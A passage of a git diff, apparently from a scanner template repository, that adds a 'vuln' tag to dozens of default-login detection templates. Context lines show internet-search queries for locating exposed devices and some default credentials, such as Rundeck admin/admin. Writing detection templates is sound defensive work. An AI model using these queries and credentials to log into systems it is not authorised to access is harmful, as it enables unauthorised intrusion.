b/http/default-logins/powershell/powershell-default-login.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 3 shodan-query: "html:\"PowerShell Universal\"" - tags: default-login,powershell-universal + tags: default-login,powershell-universal,vuln http: - raw: diff --git a/http/default-logins/prtg/prtg-default-login.yaml b/http/default-logins/prtg/prtg-default-login.yaml index 64e33fab2c8..d445ab9e2b3 100644 --- a/http/default-logins/prtg/prtg-default-login.yaml +++ b/http/default-logins/prtg/prtg-default-login.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.favicon.hash:-655683626 product: prtg_network_monitor vendor: paessler - tags: prtg,default-login + tags: prtg,default-login,vuln http: - raw: diff --git a/http/default-logins/pyload/pyload-default-login.yaml b/http/default-logins/pyload/pyload-default-login.yaml index a32cb30938b..7309d1e2594 100644 --- a/http/default-logins/pyload/pyload-default-login.yaml +++ b/http/default-logins/pyload/pyload-default-login.yaml @@ -16,7 +16,7 @@ info: vendor: pyload product: pyload shodan-query: html:"pyload" - tags: default-login,pyload + tags: default-login,pyload,vuln http: - raw: diff --git a/http/default-logins/rabbitmq/rabbitmq-default-login.yaml b/http/default-logins/rabbitmq/rabbitmq-default-login.yaml index d7a70fdd932..814e14a93a7 100644 --- a/http/default-logins/rabbitmq/rabbitmq-default-login.yaml +++ b/http/default-logins/rabbitmq/rabbitmq-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: rabbitmq,default-login + tags: rabbitmq,default-login,vuln http: - raw: diff --git a/http/default-logins/rainloop/rainloop-default-login.yaml b/http/default-logins/rainloop/rainloop-default-login.yaml index b0424a04d7b..1657933a6a8 100644 --- a/http/default-logins/rainloop/rainloop-default-login.yaml +++ b/http/default-logins/rainloop/rainloop-default-login.yaml @@ -15,7 +15,7 @@ info: vendor: rainloop product: webmail fofa-query: app="RAINLOOP-WebMail" - tags: default-login,rainloop,webmail,foss + tags: default-login,rainloop,webmail,foss,vuln http: - raw: diff --git a/http/default-logins/rancher/rancher-default-login.yaml b/http/default-logins/rancher/rancher-default-login.yaml index 59b4f4c2160..4699156c89e 100644 --- a/http/default-logins/rancher/rancher-default-login.yaml +++ b/http/default-logins/rancher/rancher-default-login.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-522 metadata: max-request: 2 - tags: default-login,rancher,kubernetes,devops,cloud + tags: default-login,rancher,kubernetes,devops,cloud,vuln http: - raw: diff --git a/http/default-logins/rconfig-default-login.yaml b/http/default-logins/rconfig-default-login.yaml index 367186976da..9cc428227f9 100644 --- a/http/default-logins/rconfig-default-login.yaml +++ b/http/default-logins/rconfig-default-login.yaml @@ -16,7 +16,7 @@ info: vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" - tags: rconfig,default-login + tags: rconfig,default-login,vuln http: - raw: diff --git a/http/default-logins/ricoh/ricoh-weak-password.yaml b/http/default-logins/ricoh/ricoh-weak-password.yaml index ae58f83fbd4..2bff99d0aff 100644 --- a/http/default-logins/ricoh/ricoh-weak-password.yaml +++ b/http/default-logins/ricoh/ricoh-weak-password.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: ricoh,default-login + tags: ricoh,default-login,vuln http: - raw: diff --git a/http/default-logins/riello/netman-default-login.yaml b/http/default-logins/riello/netman-default-login.yaml index 91f0fd6ba7e..3304deb796a 100644 --- a/http/default-logins/riello/netman-default-login.yaml +++ b/http/default-logins/riello/netman-default-login.yaml @@ -17,7 +17,7 @@ info: product: netman_204_firmware shodan-query: title:"Netman" censys-query: services.http.response.body:"Netman204" - tags: default-login,netman + tags: default-login,netman,vuln http: - raw: diff --git a/http/default-logins/ritecms/ritecms-default-login.yaml b/http/default-logins/ritecms/ritecms-default-login.yaml index c59188a20b4..e55d0d1f7f5 100644 --- a/http/default-logins/ritecms/ritecms-default-login.yaml +++ b/http/default-logins/ritecms/ritecms-default-login.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: title="ritecms" - tags: ritecms,default-login + tags: ritecms,default-login,vuln variables: username: "admin" diff --git a/http/default-logins/rocketlms/rocketlms-default-login.yaml b/http/default-logins/rocketlms/rocketlms-default-login.yaml index 6036dde52da..54065219a93 100644 --- a/http/default-logins/rocketlms/rocketlms-default-login.yaml +++ b/http/default-logins/rocketlms/rocketlms-default-login.yaml @@ -16,7 +16,7 @@ info: vendor: rocketsoft product: rocket-lms shodan-query: html:"Rocket LMS" - tags: default-login,lms,rocketlms + tags: default-login,lms,rocketlms,vuln http: - raw: diff --git a/http/default-logins/rockmongo/rockmongo-default-login.yaml b/http/default-logins/rockmongo/rockmongo-default-login.yaml index ed809e7bfc0..257d6e9f026 100644 --- a/http/default-logins/rockmongo/rockmongo-default-login.yaml +++ b/http/default-logins/rockmongo/rockmongo-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: rockmongo,default-login + tags: rockmongo,default-login,vuln http: - raw: diff --git a/http/default-logins/rseenet/rseenet-default-login.yaml b/http/default-logins/rseenet/rseenet-default-login.yaml index 316a06ab861..0ffdd8ab126 100644 --- a/http/default-logins/rseenet/rseenet-default-login.yaml +++ b/http/default-logins/rseenet/rseenet-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: rseenet,default-login + tags: rseenet,default-login,vuln http: - raw: diff --git a/http/default-logins/ruckus/ruckus-wireless-default-login.yaml b/http/default-logins/ruckus/ruckus-wireless-default-login.yaml index 80526d26dba..9fdb5d5b94b 100644 --- a/http/default-logins/ruckus/ruckus-wireless-default-login.yaml +++ b/http/default-logins/ruckus/ruckus-wireless-default-login.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 1 shodan-query: title:"ruckus" - tags: default-login,router,ruckus + tags: default-login,router,ruckus,vuln http: - raw: diff --git a/http/default-logins/ruijie/ruijie-nbr-default-login.yaml b/http/default-logins/ruijie/ruijie-nbr-default-login.yaml index a1d4ce6ba5d..fe545a5f68f 100644 --- a/http/default-logins/ruijie/ruijie-nbr-default-login.yaml +++ b/http/default-logins/ruijie/ruijie-nbr-default-login.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true fofa-query: body="上层网络出现异常,请检查外网线路或联系ISP运营商协助排查" - tags: default-login,ruijie-nbr + tags: default-login,ruijie-nbr,vuln http: - raw: diff --git a/http/default-logins/rundeck/rundeck-default-login.yaml b/http/default-logins/rundeck/rundeck-default-login.yaml index 22a81d2b8e3..2345f714846 100644 --- a/http/default-logins/rundeck/rundeck-default-login.yaml +++ b/http/default-logins/rundeck/rundeck-default-login.yaml @@ -17,7 +17,7 @@ info: vendor: pagerduty product: rundeck fofa-query: app="Rundeck-Login" - tags: default-login,rundeck + tags: default-login,rundeck,vuln variables: username: admin password: admin diff --git a/http/default-logins/samsung/samsung-printer-default-login.yaml b/http/default-logins/samsung/samsung-printer-default-login.yaml index 9b1948a5155..408cdf417ff 100644 --- a/http/default-logins/samsung/samsung-printer-default-login.yaml +++ b/http/default-logins/samsung/samsung-printer-default-login.yaml @@ -19,7 +19,7 @@ info: shodan-query: title:"SyncThru Web Service" product: scx-6555n vendor: samsung - tags: default-login,iot,samsung,printer + tags: default-login,iot,samsung,printer,vuln http: - raw: diff --git a/http/default-logins/samsung/samsung-wlan-default-login.yaml b/http/default-logins/samsung/samsung-wlan-default-login.yaml index e9edf91c602..2ee7ffb7646 100644 --- a/http/default-logins/samsung/samsung-wlan-default-login.yaml +++ b/http/default-logins/samsung/samsung-wlan-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: samsung,default-login + tags: samsung,default-login,vuln http: - raw: diff --git a/http/default-logins/sato/sato-default-login.yaml b/http/default-logins/sato/sato-default-login.yaml index b85108e7a3e..44b4c74861d 100644 --- a/http/default-logins/sato/sato-default-login.yaml +++ b/http/default-logins/sato/sato-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"Sato" - tags: sato,default-login,printer + tags: sato,default-login,printer,vuln http: - raw: diff --git a/http/default-logins/seeddms/seeddms-default-login.yaml b/http/default-logins/seeddms/seeddms-default-login.yaml index 5b2f9bf7aad..084b59caedf 100644 --- a/http/default-logins/seeddms/seeddms-default-login.yaml +++ b/http/default-logins/seeddms/seeddms-default-login.yaml @@ -18,7 +18,7 @@ info: shodan-query: http.title:"SeedDMS" product: seeddms vendor: seeddms - tags: default-login,seeddms + tags: default-login,seeddms,vuln http: - raw: diff --git a/http/default-logins/seeyon/seeyon-a8-default-login.yaml b/http/default-logins/seeyon/seeyon-a8-default-login.yaml index a06c5f9fb5d..22ef095a2a5 100755 --- a/http/default-logins/seeyon/seeyon-a8-default-login.yaml +++ b/http/default-logins/seeyon/seeyon-a8-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 fofa-query: app="致远互联-OA" - tags: seeyon,oa,default-login + tags: seeyon,oa,default-login,vuln http: - raw: diff --git a/http/default-logins/seeyon/seeyon-monitor-default-login.yaml b/http/default-logins/seeyon/seeyon-monitor-default-login.yaml index 8c3d403b99d..a8bc1ff84a6 100755 --- a/http/default-logins/seeyon/seeyon-monitor-default-login.yaml +++ b/http/default-logins/seeyon/seeyon-monitor-default-login.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: app="致远互联-OA" - tags: seeyon,oa,default-login + tags: seeyon,oa,default-login,vuln http: - raw: diff --git a/http/default-logins/sequoiadb/sequoiadb-default-login.yaml b/http/default-logins/sequoiadb/sequoiadb-default-login.yaml index b03a151c606..40944b1ae0a 100644 --- a/http/default-logins/sequoiadb/sequoiadb-default-login.yaml +++ b/http/default-logins/sequoiadb/sequoiadb-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: default-login,sequoiadb + tags: default-login,sequoiadb,vuln http: - raw: diff --git a/http/default-logins/showdoc/showdoc-default-login.yaml b/http/default-logins/showdoc/showdoc-default-login.yaml index e0e4b0799a6..14ffae64eb1 100644 --- a/http/default-logins/showdoc/showdoc-default-login.yaml +++ b/http/default-logins/showdoc/showdoc-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: showdoc,default-login + tags: showdoc,default-login,vuln http: - raw: diff --git a/http/default-logins/siemens/siemens-simatic-default-login.yaml b/http/default-logins/siemens/siemens-simatic-default-login.yaml index 6f11aef1560..2d6c223f927 100644 --- a/http/default-logins/siemens/siemens-simatic-default-login.yaml +++ b/http/default-logins/siemens/siemens-simatic-default-login.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: title:"Miniweb Start Page" - tags: ics,siemens,default-login + tags: ics,siemens,default-login,vuln http: - raw: diff --git a/http/default-logins/smartbi/smartbi-default-login.yaml b/http/default-logins/smartbi/smartbi-default-login.yaml index 1c3b3369cd5..e1189012fdd 100755 --- a/http/default-logins/smartbi/smartbi-default-login.yaml +++ b/http/default-logins/smartbi/smartbi-default-login.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 2 fofa-query: app="SMARTBI" - tags: smartbi,default-login + tags: smartbi,default-login,vuln http: - raw: diff --git a/http/default-logins/softether/softether-vpn-default-login.yaml b/http/default-logins/softether/softether-vpn-default-login.yaml index 720a37af797..a19f7164ddd 100644 --- a/http/default-logins/softether/softether-vpn-default-login.yaml +++ b/http/default-logins/softether/softether-vpn-default-login.yaml @@ -16,7 +16,7 @@ info: vendor: softether product: vpn shodan-query: title:"SoftEther VPN Server" - tags: misconfig,vpn,softether,default-login + tags: misconfig,vpn,softether,default-login,vuln http: - raw: diff --git a/http/default-logins/solarwinds/solarwinds-default-login.yaml b/http/default-logins/solarwinds/solarwinds-default-login.yaml index 64596af4732..6345b495039 100644 --- a/http/default-logins/solarwinds/solarwinds-default-login.yaml +++ b/http/default-logins/solarwinds/solarwinds-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 2 - tags: solarwinds,default-login + tags: solarwinds,default-login,vuln # Optional: # POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1 diff --git a/http/default-logins/sonarqube/sonarqube-default-login.yaml b/http/default-logins/sonarqube/sonarqube-default-login.yaml index dc02079ffc3..725028dcf21 100644 --- a/http/default-logins/sonarqube/sonarqube-default-login.yaml +++ b/http/default-logins/sonarqube/sonarqube-default-login.yaml @@ -19,7 +19,7 @@ info: shodan-query: title:"Sonarqube" product: sonarqube vendor: sonarsource - tags: default-login,sonarqube + tags: default-login,sonarqube,vuln http: - raw: diff --git a/http/default-logins/soplanning/soplanning-default-login.yaml b/http/default-logins/soplanning/soplanning-default-login.yaml index b30ee2d288f..c370ab04ddb 100644 --- a/http/default-logins/soplanning/soplanning-default-login.yaml +++ b/http/default-logins/soplanning/soplanning-default-login.yaml @@ -17,7 +17,7 @@ info: - html:"soplanning" - http.html:"soplanning" fofa-query: body="soplanning" - tags: soplanning,default-login + tags: soplanning,default-login,vuln http: - raw: diff --git a/http/default-logins/spectracom/spectracom-default-login.yaml b/http/default-logins/spectracom/spectracom-default-login.yaml index 2cbd0de5a8a..26006c1a107 100644 --- a/http/default-logins/spectracom/spectracom-default-login.yaml +++ b/http/default-logins/spectracom/spectracom-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: spectracom,default-login + tags: spectracom,default-login,vuln http: - raw: diff --git a/http/default-logins/splunk/splunk-default-login.yaml b/http/default-logins/splunk/splunk-default-login.yaml index 73c9f181a97..341ee5b9f3e 100644 --- a/http/default-logins/splunk/splunk-default-login.yaml +++ b/http/default-logins/splunk/splunk-default-login.yaml @@ -14,7 +14,7 @@ info: vendor: splunk product: splunk shodan-query: http.title:"Splunk" - tags: default-login,splunk + tags: default-login,splunk,vuln http: - raw: diff --git a/http/default-logins/stackstorm/stackstorm-default-login.yaml b/http/default-logins/stackstorm/stackstorm-default-login.yaml index 10fcd3bda2d..91e473144eb 100644 --- a/http/default-logins/stackstorm/stackstorm-default-login.yaml +++ b/http/default-logins/stackstorm/stackstorm-default-login.yaml @@ -17,7 +17,7 @@ info: fofa-query: app="stackstorm" product: stackstorm vendor: stackstorm - tags: stackstorm,default-login + tags: stackstorm,default-login,vuln http: - raw: diff --git a/http/default-logins/steve/steve-default-login.yaml b/http/default-logins/steve/steve-default-login.yaml index a6c594a279b..9c270c2c85e 100644 --- a/http/default-logins/steve/steve-default-login.yaml +++ b/http/default-logins/steve/steve-default-login.yaml @@ -21,7 +21,7 @@ info: google-query: intitle:"SteVe - Steckdosenverwaltung" product: steve vendor: steve-community - tags: panel,default-login,steve + tags: panel,default-login,steve,vuln http: - raw: diff --git a/http/default-logins/structurizr/structurizr-default-login.yaml b/http/default-logins/structurizr/structurizr-default-login.yaml index e27f586bee7..715431712fb 100644 --- a/http/default-logins/structurizr/structurizr-default-login.yaml +++ b/http/default-logins/structurizr/structurizr-default-login.yaml @@ -15,7 +15,7 @@ info: product: on-premises_installation vendor: structurizr fofa-query: icon_hash=1199592666 - tags: structurizr,default-login + tags: structurizr,default-login,vuln http: - raw: diff --git a/http/default-logins/supermicro/supermicro-default-login.yaml b/http/default-logins/supermicro/supermicro-default-login.yaml index e9eaec7c206..f74a93c3099 100644 --- a/http/default-logins/supermicro/supermicro-default-login.yaml +++ b/http/default-logins/supermicro/supermicro-default-login.yaml @@ -9,7 +9,7 @@ info: - https://www.gearprimer.com/wiki/supermicro-ipmi-default-username-pasword/ metadata: max-request: 2 - tags: supermicro,default-login + tags: supermicro,default-login,vuln http: - raw: diff --git a/http/default-logins/szhe/szhe-default-login.yaml b/http/default-logins/szhe/szhe-default-login.yaml index d35830e3cac..91daf9014ed 100644 --- a/http/default-logins/szhe/szhe-default-login.yaml +++ b/http/default-logins/szhe/szhe-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: szhe,default-login + tags: szhe,default-login,vuln http: - raw: diff --git a/http/default-logins/timekeeper/timekeeper-default-login.yaml b/http/default-logins/timekeeper/timekeeper-default-login.yaml index 0f6f8164ab4..5224b8c1cdb 100644 --- a/http/default-logins/timekeeper/timekeeper-default-login.yaml +++ b/http/default-logins/timekeeper/timekeeper-default-login.yaml @@ -15,7 +15,7 @@ info: product: timekeeper vendor: fsmlabs fofa-query: icon_hash=2134367771 - tags: timekeeper,default-login + tags: timekeeper,default-login,vuln http: - raw: diff --git a/http/default-logins/tiny-file-manager-default-login.yaml b/http/default-logins/tiny-file-manager-default-login.yaml index 125b5f9571b..493845dfe90 100644 --- a/http/default-logins/tiny-file-manager-default-login.yaml +++ b/http/default-logins/tiny-file-manager-default-login.yaml @@ -19,7 +19,7 @@ info: shodan-query: html:"Tiny File Manager" product: tinyfilemanager vendor: tinyfilemanager_project - tags: default-login,tiny,filemanager + tags: default-login,tiny,filemanager,vuln http: - raw: diff --git a/http/default-logins/tooljet/tooljet-default-login.yaml b/http/default-logins/tooljet/tooljet-default-login.yaml index 23f2f035bff..ff352778ae2 100644 --- a/http/default-logins/tooljet/tooljet-default-login.yaml +++ b/http/default-logins/tooljet/tooljet-default-login.yaml @@ -19,7 +19,7 @@ info: shodan-query: title:"tooljet" product: tooljet vendor: tooljet - tags: default-login,tooljet + tags: default-login,tooljet,vuln http: - raw: diff --git a/http/default-logins/topaccess/topaccess-default-login.yaml b/http/default-logins/topaccess/topaccess-default-login.yaml index 1bd575653c7..46f4fa4945d 100644 --- a/http/default-logins/topaccess/topaccess-default-login.yaml +++ b/http/default-logins/topaccess/topaccess-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 2 shodan-query: title:"topaccess" - tags: topaccess,default-login,misconfig + tags: topaccess,default-login,misconfig,vuln variables: username: "admin" diff --git a/http/default-logins/tplink/tplink-r470t-default-login.yaml b/http/default-logins/tplink/tplink-r470t-default-login.yaml index 762b97fb1f9..548d640f341 100644 --- a/http/default-logins/tplink/tplink-r470t-default-login.yaml +++ b/http/default-logins/tplink/tplink-r470t-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: "r470t" - tags: tp-link,r470t,default-login,misconfig + tags: tp-link,r470t,default-login,misconfig,vuln variables: username: "admin" diff --git a/http/default-logins/tplink/tplink-wR940n-default-login.yaml b/http/default-logins/tplink/tplink-wR940n-default-login.yaml index aacf34ecb4e..15892dc65b4 100644 --- a/http/default-logins/tplink/tplink-wR940n-default-login.yaml +++ b/http/default-logins/tplink/tplink-wR940n-default-login.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: html:"/userRpm/" - tags: tplink,wR940n,default-login,misconfig + tags: tplink,wR940n,default-login,misconfig,vuln variables: username: "admin" diff --git a/http/default-logins/trassir/trassir-default-login.yaml b/http/default-logins/trassir/trassir-default-login.yaml index 841cdd2a71d..183e783cacc 100644 --- a/http/default-logins/trassir/trassir-default-login.yaml +++ b/http/default-logins/trassir/trassir-default-login.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 1 shodan-query: title:"Trassir Webview" - tags: default-login,trassir,webview + tags: default-login,trassir,webview,vuln http: - raw: diff --git a/http/default-logins/umami/umami-default-login.yaml b/http/default-logins/umami/umami-default-login.yaml index 61b68615ea7..6f8fafb1a7a 100644 --- a/http/default-logins/umami/umami-default-login.yaml +++ b/http/default-logins/umami/umami-default-login.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: umami,default-login + tags: umami,default-login,vuln http: - raw: diff --git a/http/default-logins/unify/unify-hipath-default-login.yaml b/http/default-logins/unify/unify-hipath-default-login.yaml index a38b5309e42..e4711b584d5 100644 --- a/http/default-logins/unify/unify-hipath-default-login.yaml +++ b/http/default-logins/unify/unify-hipath-default-login.yaml @@ -22,7 +22,7 @@ info: max-request: 2 product: hipath vendor: unify - tags: default-login,unify,hipath + tags: default-login,unify,hipath,vuln http: - method: GET diff --git a/http/default-logins/versa/versa-default-login.yaml b/http/default-logins/versa/versa-default-login.yaml index 903c16194e6..27f0eff709a 100644 --- a/http/default-logins/versa/versa-default-login.yaml +++ b/http/default-logins/versa/versa-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 2 - tags: default-login,versa,sdwan + tags: default-login,versa,sdwan,vuln http: - raw: diff --git a/http/default-logins/versa/versa-flexvnf-default-login.yaml b/http/default-logins/versa/versa-flexvnf-default-login.yaml index 95e7477d25a..4cbffa0c37b 100644 --- a/http/default-logins/versa/versa-flexvnf-default-login.yaml +++ b/http/default-logins/versa/versa-flexvnf-default-login.yaml @@ -18,7 +18,7 @@ info: shodan-query: title:"Flex VNF Web-UI" product: versa_operating_system vendor: versa-networks - tags: default-login,versa,flexvnf + tags: default-login,versa,flexvnf,vuln http: - raw: diff --git a/http/default-logins/vidyo/vidyo-default-login.yaml b/http/default-logins/vidyo/vidyo-default-login.yaml index 29e49b993c6..9ce89ff7149 100644 --- a/http/default-logins/vidyo/vidyo-default-login.yaml +++ b/http/default-logins/vidyo/vidyo-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 2 - tags: vidyo,default-login + tags: vidyo,default-login,vuln http: - raw: diff --git a/http/default-logins/viewpoint/trilithic-viewpoint-login.yaml b/http/default-logins/viewpoint/trilithic-viewpoint-login.yaml index f574efcc6b4..f2e554b95df 100644 --- a/http/default-logins/viewpoint/trilithic-viewpoint-login.yaml +++ b/http/default-logins/viewpoint/trilithic-viewpoint-login.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: default-login,trilithic,viewpoint + tags: default-login,trilithic,viewpoint,vuln http: - raw: diff --git a/http/default-logins/visionhub/visionhub-default-login.yaml b/http/default-logins/visionhub/visionhub-default-login.yaml index 48ac4f36b89..fa6c6058ae0 100644 --- a/http/default-logins/visionhub/visionhub-default-login.yaml +++ b/http/default-logins/visionhub/visionhub-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: visionhub,default-login + tags: visionhub,default-login,vuln http: - raw: diff --git a/http/default-logins/wago/wago-webbased-default-login.yaml b/http/default-logins/wago/wago-webbased-default-login.yaml index b30efeeaac1..0ee4d8e8d70 100644 --- a/http/default-logins/wago/wago-webbased-default-login.yaml +++ b/http/default-logins/wago/wago-webbased-default-login.yaml @@ -10,7 +10,7 @@ info: shodan-query: html:"WAGO Ethernet Web-based Management" verified: true max-request: 1 - tags: wago,default-login + tags: wago,default-login,vuln http: - raw: diff --git a/http/default-logins/wayos/ac-weak-login.yaml b/http/default-logins/wayos/ac-weak-login.yaml index d1b44fc8ebd..a85d0565658 100755 --- a/http/default-logins/wayos/ac-weak-login.yaml +++ b/http/default-logins/wayos/ac-weak-login.yaml @@ -13,7 +13,7 @@ info: verified: "true" max-request: 1 fofa-query: 'title="安网科技-智能路由系统"' - tags: ways-ac,default-login + tags: ways-ac,default-login,vuln http: - raw: diff --git a/http/default-logins/wazuh-default-login.yaml b/http/default-logins/wazuh-default-login.yaml index db0312b5aef..bfe1b1ae050 100644 --- a/http/default-logins/wazuh-default-login.yaml +++ b/http/default-logins/wazuh-default-login.yaml @@ -18,7 +18,7 @@ info: vendor: wazuh product: wazuh shodan-query: "title:\"Wazuh\"" - tags: wazuh,default-login + tags: wazuh,default-login,vuln http: - method: GET diff --git a/http/default-logins/weblogic/weblogic-weak-login.yaml b/http/default-logins/weblogic/weblogic-weak-login.yaml index 9c4924b63c0..7563f424aa4 100644 --- a/http/default-logins/weblogic/weblogic-weak-login.yaml +++ b/http/default-logins/weblogic/weblogic-weak-login.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-522 metadata: max-request: 16 - tags: default-login,weblogic,vulhub + tags: default-login,weblogic,vulhub,vuln http: - raw: diff --git a/http/default-logins/webmethod/webmethod-integration-default-login.yaml b/http/default-logins/webmethod/webmethod-integration-default-login.yaml index 8966c54abda..dbcb8d71769 100644 --- a/http/default-logins/webmethod/webmethod-integration-default-login.yaml +++ b/http/default-logins/webmethod/webmethod-integration-default-login.yaml @@ -14,7 +14,7 @@ info: shodan-query: "http.favicon.hash:-234335289" product: webmethods vendor: softwareag - tags: default-login,webmethod + tags: default-login,webmethod,vuln flow: http(1) && http(2) http: diff --git a/http/default-logins/webmin-default-login.yaml b/http/default-logins/webmin-default-login.yaml index c4e7af8f0c0..40efbfefecc 100644 --- a/http/default-logins/webmin-default-login.yaml +++ b/http/default-logins/webmin-default-login.yaml @@ -18,7 +18,7 @@ info: shodan-query: title:"Webmin" product: webmin vendor: webmin - tags: webmin,default-login + tags: webmin,default-login,vuln http: - raw: diff --git a/http/default-logins/wifisky/wifisky-default-login.yaml b/http/default-logins/wifisky/wifisky-default-login.yaml index 9f095610e3a..01ca1639516 100644 --- a/http/default-logins/wifisky/wifisky-default-login.yaml +++ b/http/default-logins/wifisky/wifisky-default-login.yaml @@ -16,7 +16,7 @@ info: max-request: 1 shodan-query: title:"WIFISKY-7层流控路由器" fofa-query: app="WIFISKY-7层流控路由器" - tags: default-login,wifisky + tags: default-login,wifisky,vuln http: - raw: diff --git a/http/default-logins/wildfly/wildfly-default-login.yaml b/http/default-logins/wildfly/wildfly-default-login.yaml index 21a52157233..c11d529a511 100644 --- a/http/default-logins/wildfly/wildfly-default-login.yaml +++ b/http/default-logins/wildfly/wildfly-default-login.yaml @@ -10,7 +10,7 @@ info: - https://docs.wildfly.org/26.1/#administrator-guides metadata: max-request: 1 - tags: wildfly,default-login + tags: wildfly,default-login,vuln http: - raw: diff --git a/http/default-logins/wso2/wso2-default-login.yaml b/http/default-logins/wso2/wso2-default-login.yaml index 737b4489615..15042ff18c7 100644 --- a/http/default-logins/wso2/wso2-default-login.yaml +++ b/http/default-logins/wso2/wso2-default-login.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: default-login,wso2 + tags: default-login,wso2,vuln http: - raw: diff --git a/http/default-logins/xerox/xerox7-default-login.yaml b/http/default-logins/xerox/xerox7-default-login.yaml index 6b7e0d1b65f..96ed7b93e52 100644 --- a/http/default-logins/xerox/xerox7-default-login.yaml +++ b/http/default-logins/xerox/xerox7-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: xerox,default-login + tags: xerox,default-login,vuln http: - raw: diff --git a/http/default-logins/xnat/xnat-default-login.yaml b/http/default-logins/xnat/xnat-default-login.yaml index c784c154d87..99afad6055c 100644 --- a/http/default-logins/xnat/xnat-default-login.yaml +++ b/http/default-logins/xnat/xnat-default-login.yaml @@ -18,7 +18,7 @@ info: shodan-query: http.title:"XNAT" product: xnat vendor: xnat - tags: default-login,xnat + tags: default-login,xnat,vuln http: - raw: diff --git a/http/default-logins/xploitspy/xploitspy-default-login.yaml b/http/default-logins/xploitspy/xploitspy-default-login.yaml index 1f48a37608d..41159926162 100644 --- a/http/default-logins/xploitspy/xploitspy-default-login.yaml +++ b/http/default-logins/xploitspy/xploitspy-default-login.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: html:XploitSPY - tags: xploitspy,default-login + tags: xploitspy,default-login,vuln http: - raw: diff --git a/http/default-logins/xui/xui-default-login.yaml b/http/default-logins/xui/xui-default-login.yaml index 175e42ddcfd..f40be409380 100644 --- a/http/default-logins/xui/xui-default-login.yaml +++ b/http/default-logins/xui/xui-default-login.yaml @@ -19,7 +19,7 @@ info: shodan-query: title:"X-UI Login" product: x-ui vendor: vaxilu - tags: x-ui,default-login + tags: x-ui,default-login,vuln http: - method: GET diff --git a/http/default-logins/xxljob/xxljob-default-login.yaml b/http/default-logins/xxljob/xxljob-default-login.yaml index ff8e42579d4..11ea534b3a5 100644 --- a/http/default-logins/xxljob/xxljob-default-login.yaml +++ b/http/default-logins/xxljob/xxljob-default-login.yaml @@ -18,7 +18,7 @@ info: product: xxl-job vendor: xuxueli fofa-query: icon_hash=1691956220 - tags: default-login,xxljob + tags: default-login,xxljob,vuln http: - raw: diff --git a/http/default-logins/yacht/yacht-default-login.yaml b/http/default-logins/yacht/yacht-default-login.yaml index 03256bddc8e..99f19f96aa3 100644 --- a/http/default-logins/yacht/yacht-default-login.yaml +++ b/http/default-logins/yacht/yacht-default-login.yaml @@ -14,7 +14,7 @@ info: max-request: 1 fofa-query: app="Yacht" zoomeye-query: app="Yacht" - tags: default-login,yacht,misconfig + tags: default-login,yacht,misconfig,vuln variables: username: "admin@yacht.local" diff --git a/http/default-logins/yealink/yealink-default-login.yaml b/http/default-logins/yealink/yealink-default-login.yaml index 65594de3f19..05a8a5f279a 100644 --- a/http/default-logins/yealink/yealink-default-login.yaml +++ b/http/default-logins/yealink/yealink-default-login.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: Yealink CTP18 - tags: default-login,yealink + tags: default-login,yealink,vuln http: - raw: diff --git a/http/default-logins/zabbix/zabbix-default-login.yaml b/http/default-logins/zabbix/zabbix-default-login.yaml index c4c60d6ebaf..0ab147b80d5 100644 --- a/http/default-logins/zabbix/zabbix-default-login.yaml +++ b/http/default-logins/zabbix/zabbix-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 2 - tags: zabbix,default-login + tags: zabbix,default-login,vuln http: - raw: diff --git a/http/default-logins/zebra/zebra-printer-default-login.yaml b/http/default-logins/zebra/zebra-printer-default-login.yaml index 2710c1690f2..420fb09370a 100644 --- a/http/default-logins/zebra/zebra-printer-default-login.yaml +++ b/http/default-logins/zebra/zebra-printer-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 4 